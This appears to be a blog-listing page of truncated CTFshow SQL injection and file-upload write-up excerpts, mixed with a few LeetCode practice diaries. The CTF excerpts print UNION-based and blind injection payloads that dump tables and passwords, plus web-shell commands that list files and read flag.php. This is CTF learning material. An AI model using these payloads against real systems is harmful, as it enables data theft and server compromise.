CTFSHOW刷题日记第6页

ctfshow SQL注入专题

哦对了，这篇文章还没写完，更新中...emmm又是好久没更新了...之后就在这里做个记录吧，有些新的思路可以做些分享web174看了一下，应该是有数字或者username=flag就不输出，主要是这个数字的限制有点烦，flag里面肯定是有数字的...网上的wp很多用的布尔盲注，不过我当时还是想直接注出来，还是有办法的。参考前面几道题，可以使用to_base64函数，对于一个字符而言，不管是数字还是

yink12138·2023-11-15 07:39

ctfshow刷题日记sql注入篇

web171没有任何过滤那应该在这张表里面，直接用1'or'1'='1即可拿到表单的所有信息（也可以直接查询）web172添加了限制条件，上面的不能用了，还是单引号闭合，直接联合查询最终payload：-1'unionselect1,(selectpasswordfromctfshow_user2whereusername=flag);--+或者直接爆他所有的内容。-1'unionselect1,

Yan9.·2023-11-15 07:39

ctfshow web入门 sql注入

无过滤注入web171查询语句$sql="selectusername,passwordfromuserwhereusername!='flag'andid='".$_GET['id']."'limit1;";单引号闭合,未做任何过滤payload:1'unionselect1,group_concat(table_name),3frominformation_schema.tableswhere

S1nJa·2023-11-15 07:08

ctfshow web 入门 sql注入

171、常规题型（需要把前面数字换为-1，注释用--+）查数据库payload=“-1’unionselect1,2,group_concat(table_name)frominformation_schema.tableswheretable_schema=database()--+”查列名payload="-1’unionselect1,2,group_concat(column_name)f

放空 123·2023-11-15 07:08

ctfshow web入门 sql注入（持续更新）

文章目录web171web172web173web174web175web176web177web178web179web180-182web183web184web185-186web187web188web189web191web199-200web201web202web171第一题嘛，都是最基础的，单引号闭合，用联合查询注入即可。1'orderby3----1'unionselect1,2

Lum1n0us·2023-11-15 07:07

ctfshow web入门 sql注入wp（未完）

目录web171题目源码解题思路Payloadweb172题目源码解题思路Payloadweb173题目源码解题思路Payloadweb174题目源码解题思路PayloadEXPweb175题目源码解题思路Payloadweb176题目源码解题思路Payloadweb177题目源码解题思路Payloadweb178题目源码解题思路Payloadweb179题目源码解题思路Payloadweb180

久而不念·2023-11-15 07:07

CTFSHOW web入门 sql注入无过滤注入 web171-175

目录web171web172web173web174web175web171select查询语句//拼接sql语句查找指定ID用户$sql="selectusername,passwordfromuserwhereusername!='flag'andid='".$_GET['id']."'limit1;";尝试万能密码id=1'or'1'='1,进行查询，发现查询结果是数据库中全部内容，成功获得

起名字怎么这么难·2023-11-15 07:35

ctfshow web入门 sql注入(超详解)201-250

web201查询语句//拼接sql语句查找指定ID用户$sql="selectid,username,passwordfromctfshow_userwhereusername!='flag'andid='".$_GET['id']."';";返回逻辑//对传入的参数进行了过滤functionwaf($str){//代码过于简单，不宜展示}需要学会：使用--user-agent指定agent--u

Yn8rt·2023-11-15 06:33

[CTFSHOW][WEB入门] SQL注入

web171参数类型字符型SQL语句SELECT注入方式回显注入查询语句//拼接sql语句查找指定ID用户$sql="selectid,username,passwordfromctfshow_userwhereusername!='flag'andid='".$_GET['id']."'limit1;";#确定回显列数-1'unionselectNULL,NULL,NULL--+#查询当前数据库

fallingskies22·2023-11-15 06:03

ctfshow-web入门-sql

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档ctfshow-web入门-sql题目一、web171二、web172三、web173四、web174五、web175六、web176七、

林本·2023-11-15 06:03

ctfshow web入门174

题目给出了查询语句和返回逻辑先看查询语句$sql="selectusername,passwordfromctfshow_user4whereusername!='flag'andid='".$_GET['id']."'limit1;";这里能直接看出来是使用单引号进行绕过是一个字符型注入继续，查看返回逻辑if(!preg_match('/flag|[0-9]/i',json_encode($re

Jt2312·2023-11-15 06:31

ctfshow学习记录-web入门（sql注入171-180）

目录web171web172web173web174web175web176web177web178web179web180web171解答：打开页面，提供了sql语句源码，是单引号闭合。这里可以用1'and'1'='1和1'and'1'='2测试一下闭合。1'and'1'='1正常显示，1'and'1'='2不正常显示。单引号完全闭合，且不过滤空格，and等。确定列数，同时确定可回显位置，经过测

九枕·2023-11-15 06:30

ctfshow web入门 sql注入做题记录

ctfshowweb入门sql注入前言，感谢y4师傅详尽的教程[CTFSHOW]SQL注入(WEB入门)_Y4tacker的博客-CSDN博客_ctfshowsql注入sql注入的产生：php中对数据库的操作非常简化

AshMOB·2023-11-15 06:29

ctfshow sql入门174 175脚本

因为觉得脚本写的太烂了，二分法也迷迷糊糊的主要是python怎么学的那么烂！！再研究一下174布尔盲注这是不使用二分法的importrequestsurl='http://e9a1012f-6cb2-451d-9084-0d011dfcff89.challenge.ctf.show/api/v4.php'flag=''foriinrange(60):forjinrange(32,128):payl

木…·2023-11-15 06:55

力扣(SQL)511. 游戏玩法分析 I

刷题日记一、题目二、题解1.SQL语句2.解析总结一、题目二、题解1.SQL语句代码如下（示例）：SELECTplayer_id,min(event_date)first_loginFROMActivityGROUPBYplayer_id

Lmy020802·2023-11-15 01:08

LeetCode刷题日记2021-4-6/80.删除有序数组中的重复性II/指针解法

仅供自己学习记录LeetCode刷题日记2021-4-6题目描述：给你一个有序数组nums，请你原地删除重复出现的元素，使每个元素最多出现两次，返回删除后数组的新长度。

Bu9_Maker·2023-11-15 00:39

ctfshow-184 sql注入

已知条件：flag格式：ctfshow{这个字符开头。好多wp和官方视频没有解释为什么要使用$user_count=43,来做判断条件，基本不好的小白就很难受了。

yxlr_beta·2023-11-14 20:49

ctf php sql注入,CTFshow-WEB入门-SQL注入(下)(持续更新)

web227按照上一题的方法，发现查不出flag表了，把ctfshow_user表给爆了一下也没flag，然后写一句话马，蚁剑连上去还是找不到flag，人傻了。。。

itwebber·2023-11-14 20:46

CTFshow-WEB入门-SQL注入(上)

web171无任何过滤，直接注就完事了。'unionselect1,2,group_concat(password)fromctfshow_user---web172'unionselect1,group_concat(password)fromctfshow_user2--+web173'unionselect1,2,group_concat(password)fromctfshow_user3

bfengj·2023-11-14 20:44

ctfshow- sql注入(web入门）

目录web171web172web173web174web175WEB176web177web178web179web180web181—182（180也可以用）web183web184web171简单的注入//查表名payload="1'unionselect1,2,group_concat(table_name)frominformation_schema.tableswheretable_s

ZredamanJ·2023-11-14 20:43

【CTF】CTFshow-SQL注入（持续更新）

【CTF】CTFshow-SQL注入（持续更新）就剩一年的大学时光了，最近也很迷茫，想找实习，又得考托福，又想提前开始毕设，假期前又要上学校安排的实训，马上还又有一门考试，事情一堆，但又感觉整天不知道自己应该做什么

Sunny-Dog·2023-11-14 20:12

ctfshow-sql注入-超详解(172-200)

前言今天是2021/7/25，正式进入sql注入专题，目标：加强python的学习，达到通过写python脚本，加快注入速度的程度，掌握sql在php编程中的一系列查询语句。新手区可以看看Y4师傅以前记录的小笔记SQL注入之MySQL注入的学习笔记(一)SQL注入之MySQL注入学习笔记(二)2021-7-25web172、web173——hex()、to_base64()查询语句//拼接sql语

Yn8rt·2023-11-14 20:42

CTFSHOW-SQL注入-二

title:CTFSHOW-SQL注入(二)date:2021-09-2509:32:11tags:CTF-WEBCTFSHOW-SQL注入（二）这里是ctfshowsql注入的第二篇题目：214-250

k1he·2023-11-14 20:42

CTFSHOW-WEB入门-SQL注入

文章目录前言web171web172web173web174web175web176web177web178web179web180web181-182web183web184web185-186web187web188web189web190web191web192web183web184堆叠注入前言最近发现对sql注入的相关知识点有点生疏和忘记了，做做ctfhshow的sql注入来巩固和学习一

天问_Herbert555·2023-11-14 20:41

ctfshow web-2(sql注入)

原题：ctf.show因为本人也是刚学sql注入，所以会尽可能的写的详细一点-------------------------------------------------1.判断是否可以进行sql注入关于进行sql注入的方法有三种。第一种：整型注入，单引号字符型注入，双引号字符型注入。我们首先使用万能账密的方式来一个一个试属于那种注入。关于万能账密，不是一个真实的账密，而是给出一个100%正确

花名咖啡·2023-11-14 20:39

CTFSHOW 文件上传

web151JS前端绕过直接上传png的图片马然后抓包修改为phpa=system("ls/var/www/html");a=system("cat/var/www/html/flag.php");web152和151一样的方法也可以实现上传a=system("ls/var/www/html");a=system("cat/var/www/html/flag.php");web153.user.i

双层小牛堡·2023-11-14 20:37

CTFshow-sql注入---弱类型转换

//拼接sql语句查找指定ID用户$sql="selectpassfromctfshow_userwhereusername={$username}";//返回逻辑//用户名检测if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|$|$|\'|\"/i',$username)){$ret['msg']='用

Flowers_beicheng·2023-11-14 20:37

ctfshow---sql注入（214-253）

目录web214web215web216web217web218web219web220web221web222web223web224web225web226web227web228-229-230web231web232web233-234web235-236web237web238web239web240web241web242web243web244web245web246web247we

T6...·2023-11-14 20:35

WEB ---- ctfshow ----- SQL注入

web171看题目$sql="selectusername,passwordfromuserwhereusername!='flag'andid='".$_GET['id']."'limit1;";//拼接sql语句查找指定ID用户我们能够控制的只有id的值，经分析，条件为username不为flag。可是只有用户名为flag才能输出正确的flag。第一步先判断是否有注入点。观察到存在单引号，所以

@See you later·2023-11-14 20:04

ctfshow---sql注入（171-213）

目录web171web172web173web174web175web176web177web178-179web180-182web183web184web185-186web187web188web189web190web191web192web193web194web195web196web197web198web199-200web201web202web203web204web205we

T6...·2023-11-14 20:04

CTFSHOW-sql注入

web171最简单的sql注入，先演示基本操作payload：-1'unionselect1,2,database()--+//得到数据库名为ctfshow_web-1'unionselect1,2,group_concat

超级兵_140·2023-11-14 20:33

CTFSHOW -SQL 注入

CTFshowsql注入上篇(web171-220)更新中-掘金【精选】CTFshow-WEB入门-SQL注入(上)_having盲注_bfengj的博客-CSDN博客web171基本联合注入拿到题目我们已经知道了是

双层小牛堡·2023-11-14 20:00

【leetcode刷题日记】121. Best Time to Buy and Sell Stock

Sayyouhaveanarrayforwhichtheithelementisthepriceofagivenstockondayi.Ifyouwereonlypermittedtocompleteatmostonetransaction(i.e.,buyoneandselloneshareofthestock),designanalgorithmtofindthemaximumprofit.N

乐观的Zqq·2023-11-14 19:17

leetcode刷题日记:121. Best Time to Buy and Sell Stock( 买卖股票的最佳时机)

题目给了我们一组数prices，其中prices[i]表示第i天的股票价格，需要我们求出买卖股票所能获得的最大收益。我们的第一想法就是从算出每一种买卖股票的情况然后求出里面的最大值，这样我们就能得到最大收益是多少，但是这种情况过于复杂他需要考虑前一天和后面所有天的情况，这无疑是复杂的，因为我们可以大致算出时间复杂度是O(n3)O(n^3)O(n3),这在问题规模较小时还可以接受一旦问题规模上升，所

apprentice_eye·2023-11-14 19:28

ctfshow sql171-179

mysql先打开我们本地的mysql，可以看到这些数据库information_schemainformation_schema库:是信息数据库，其中保存着关于MySQL服务器所维护的所有其他数据库的信息比如数据库名，数据库表，SCHEMATA表:提供了当前MySQL实例中所有的数据库信息，showdatabases结果取之此表TABLES表:提供了关于数据中表的信息COLUMNS表:提供了表中的

木…·2023-11-14 10:42

【LeetCode刷题日记】[区域和检索 - 数组不可变]

【LeetCode刷题日记】区域和检索-数组不可变给定一个整数数组nums，求出数组从索引i到j（i≤j）范围内元素的总和，包含i、j两点。

小熊coder·2023-11-14 04:09

leetcode刷题日记:118.Pascal‘s Triangle(杨辉三角)

118.Pascal’sTriangle(杨辉三角）题目给我们一个整数numRows表示杨辉三角形的行数，返回杨辉三角形的前numRows行，下面给出一个杨辉三角形看看它有哪些规律；可以看出杨辉三角形的每一行的最左侧和最右侧的值都为1.其余的第i行的第j个元素p[i][j]可以由下图确定：可以看出p[i][j]=p[i-1][j]+p[i-1][j-1]，有了上述的思路我们可以写出代码如下：int

apprentice_eye·2023-11-13 19:28

【刷题日记】贪心算法

分配问题leetcode455分发饼干假设你是一位很棒的家长，想要给你的孩子们一些小饼干。但是，每个孩子最多只能给一块饼干。对每个孩子i，都有一个胃口值g[i]，这是能让孩子们满足胃口的饼干的最小尺寸；并且每块饼干j，都有一个尺寸s[j]。如果s[j]>=g[i]，我们可以将这个饼干j分配给孩子i，这个孩子会得到满足。你的目标是尽可能满足越多数量的孩子，并输出这个最大数值。思路每个孩子只有一块饼干

火星人不会写代码·2023-11-13 13:13

leetcode刷题日记:111. Minimum Depth of Binary Tree(二叉树的最小深度)

给我们一个二叉树，我们应该如何来求二叉树的最小深度呢？二叉树的最小深度指的是叶子结点到所处的位置最小的，这就是二叉树的最小深度，也就是说我们要找的是离根结点最近的叶子结点。如果我们从根结点向下出发寻找叶子节点，一层一层的去找叶子结点最先找到的叶子结点所处于的深度就是二叉树的最小深度，而叶子结点的标志就是两个指针域都为NULL。所以我们只需要去寻找最先出现的二叉树的两个指针域都为NULL的结点。但是

apprentice_eye·2023-11-12 20:16

CTFshow—爆破、命令执行

Web入门：爆破：web24伪随机数通过mt_srand()分发种子（播种），有了种子后随机数也就确定了（随机就那一组了，因此说伪随机）mt_scrand()//播种MersenneTwister随机数生成器。mt_rand()//生成随机数详细请参考：php伪随机数解题脚本：web28要求扫描目录扫描这两个目录，各从0到100但扫描时注意不能加上2.txt否则就是扫描文件了，而不是扫描目录一般目

D.MIND·2023-11-12 10:47

leetcode刷题日记：104. Maximum Depth of Binary Tree（二叉树的最大深度）和108. Convert Sorted Array to Binary Search

要求一个二叉树的最大深度，可以先求出二叉树的左子树的深度和右子树的深度，比较这两者的大小选取其中大的在加一就是我们要求的二叉树的深度，显然这是递归定义的，递归终止的条件是root==NULLroot==NULLroot==NULL递归终止的地方树的深度是0，返回0，有了递归终止条件和递归循环下去的条件，我们可以写出如下代码：intmaxDepth(structTreeNode*root){if(r

apprentice_eye·2023-11-11 22:08

leetcode刷题日记:110. Balanced Binary Tree(平衡二叉树)

题目给了我们一个二叉树要让我们来判断这一个二叉树是不是平衡二叉树。要想判断一棵树是不是平衡二叉树，我们得首先知道平衡二叉树的定义是什么，平衡二叉树指的是这样的树它的左子树的高度与右子树高度的差的绝对值不能超过1，而且它的左子树是一颗平衡二叉树，它的右子树也是一颗平衡二叉树。画出图示如下：我们可以看出这一个二叉树的左子树是高度为3的一棵树，右子树为高度为1的一颗子树，所以这不是一颗平衡二叉树。上面这

apprentice_eye·2023-11-11 21:32

LeetCode SQL 刷题日记-DAY1

数据分析||LeetCodeSQL刷题日记LeetCodeSQL刷题日记-DAY1硕士在读数据分析小小白一枚，记录自己学习进步的点点滴滴~希望可以坚持下去！拿到理想Offer！数据人冲冲冲！！！

小小瑶---·2023-11-11 15:27

LeetCode SQL 刷题日记-DAY2

LeetCodeSQL刷题日记-DAY2硕士在读数据分析小小白一枚，记录自己学习进步的点点滴滴~希望可以坚持下去！拿到理想Offer！数据人冲冲冲！！！